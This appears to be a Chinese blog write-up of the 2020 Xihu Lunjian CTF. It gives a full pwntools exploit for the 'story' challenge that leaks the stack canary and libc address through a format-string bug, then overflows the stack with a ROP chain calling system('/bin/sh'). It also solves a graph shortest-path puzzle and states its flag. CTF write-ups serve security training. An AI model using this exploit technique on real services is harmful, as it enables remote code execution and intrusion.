CTF比赛 January 03, 2020

西湖论剑部分wp

Words count 15k Reading time 14 mins. Read count 0

Pwn题目:story

image.png

![image.png](https://upload-images.jianshu.io/upload_images/9085575-5c9429d71ed20cb7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

image.png

image.png

这题一看除了没开内存地址随机化,其他都开了,分析逻辑发现漏洞点,格式化字符串漏洞,还有栈溢出漏洞,可以泄露真实地址和canary。v1=1024个字节,在strdup这个copy函数可以实现栈溢出(绕过canary),那么很简单:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#coding=utf8
from pwn import *
context.log_level='debug'
local = 0
elf = ELF('./story')
if local:
p = process('./story')
libc = elf.libc
else:
p = remote('ctf3.linkedbyx.com',11055)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

#泄露出canary和libc_start_main
payload = ''
payload += '%15$p%25$p'
p.recvuntil("Please Tell Your ID:")
#gdb.attach(p,'b *0x00400977')
p.sendline(payload)
p.recvuntil('Hello ')
can = int(p.recvuntil('00'),16)
print hex(can)
canary = hex(can)
main = int(p.recvuntil('\n'),16)-240
print hex(main)
#计算system和binsh的真实地址
libc_main = libc.symbols['__libc_start_main']
offset = main - libc_main
system = offset + libc.symbols['system']
binsh = libc.search('/bin/sh').next() + offset
#这里随便填一个大于0x128的数
payload = ''
payload += '1000'
p.recvuntil("Tell me the size of your story:")
p.sendline(payload)
#这里覆盖canary就可以栈溢出getshell了,而且libc本地和远程一样的
pop_rdi = 0x400bd3
payload = ''
payload += 0x88*'a'
payload += p64(can)
payload += 'aaaaaaaa'
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
p.recvuntil("You can speak your story:")
p.sendline(payload)
p.interactive()

那么这道题就OK了,剩下两道堆的题目不会做,等以后再复现。

Misc:题目

1
2
3
4
5
6
7
8
9
#资深宅“flag{”在朋友邀请下,参加了一场聚会。
#在聚会上看到了美女“75D}”,一时心花荡漾、不能自己,坚信彼此就是天造地设的一双。
#想通过层层朋友的关系认识她,却无奈性格问题,不敢劳师动众。
#好在朋友帮忙搞到一张聚会人员关系图,如下:

[('FloraPrice','E11'),('FloraPrice','E9'),('FloraPrice','75D}'),('NoraFayette','E11'),('NoraFayette','E10'),('NoraFayette','E13'),('NoraFayette','E12'),('NoraFayette','E14'),('NoraFayette','E9'),('NoraFayette','E7'),('NoraFayette','E6'),('E10','SylviaAvondale'),('E10','MyraLiddel'),('E10','HelenLloyd'),('E10','KatherinaRogers'),('VerneSanderson','E7'),('VerneSanderson','E12'),('VerneSanderson','E9'),('VerneSanderson','E8'),('E12','HelenLloyd'),('E12','KatherinaRogers'),('E12','SylviaAvondale'),('E12','MyraLiddel'),('E14','SylviaAvondale'),('E14','75D}'),('E14','KatherinaRogers'),('FrancesAnderson','E5'),('FrancesAnderson','E6'),('FrancesAnderson','E8'),('FrancesAnderson','E3'),('DorothyMurchison','E9'),('DorothyMurchison','E8'),('EvelynJefferson','E9'),('EvelynJefferson','E8'),('EvelynJefferson','E5'),('EvelynJefferson','E4'),('EvelynJefferson','E6'),('EvelynJefferson','E1'),('EvelynJefferson','E3'),('EvelynJefferson','E2'),('RuthDeSand','E5'),('RuthDeSand','E7'),('RuthDeSand','E9'),('RuthDeSand','E8'),('HelenLloyd','E11'),('HelenLloyd','E7'),('HelenLloyd','E8'),('OliviaCarleton','E11'),('OliviaCarleton','E9'),('EleanorNye','E5'),('EleanorNye','E7'),('EleanorNye','E6'),('EleanorNye','E8'),('E9','TheresaAnderson'),('E9','PearlOglethorpe'),('E9','KatherinaRogers'),('E9','SylviaAvondale'),('E9','MyraLiddel'),('E8','TheresaAnderson'),('E8','PearlOglethorpe'),('E8','KatherinaRogers'),('E8','SylviaAvondale'),('E8','BrendaRogers'),('E8','LauraMandeville'),('E8','MyraLiddel'),('E5','TheresaAnderson'),('E5','BrendaRogers'),('E5','LauraMandeville'),('E5','CharlotteMcDowd'),('E4','CharlotteMcDowd'),('E4','TheresaAnderson'),('E4','BrendaRogers'),('E7','TheresaAnderson'),('E7','SylviaAvondale'),('E7','BrendaRogers'),('E7','LauraMandeville'),('E7','CharlotteMcDowd'),('E6','TheresaAnderson'),('E6','PearlOglethorpe'),('E6','BrendaRogers'),('E6','LauraMandeville'),('E1','LauraMandeville'),('E1','BrendaRogers'),('E3','TheresaAnderson'),('E3','BrendaRogers'),('E3','LauraMandeville'),('E3','CharlotteMcDowd'),('E3','flag{'),('E2','LauraMandeville'),('E2','TheresaAnderson'),('KatherinaRogers','E13'),('E13','SylviaAvondale')]

#你能在让最少人知道的情况下,帮助flag先生联系上75D小姐姐吗?
#求节点“flag{”到“75D”的最短路径,即为flag,比如:flag{E3AliceBobXXXXXXXXXXXXXXXX75D}

这是一个图题,那么就是找两个节点间的最短路径,我们知道开头有flag{E3和结尾有75D},那么可以分头行动,即从前面找flag{只与E3有关,找E3关联的,找与75D关联的,找到FloraPrice,E14,而FloraPrice与E9相关,直接写E9相关的,最后找到最短的路径(5个节点),比较菜,写不出脚本,所以直接上纸质图:

image.png

所以flag{E3EvelyJeffersonE9FloraPrice75D}

0%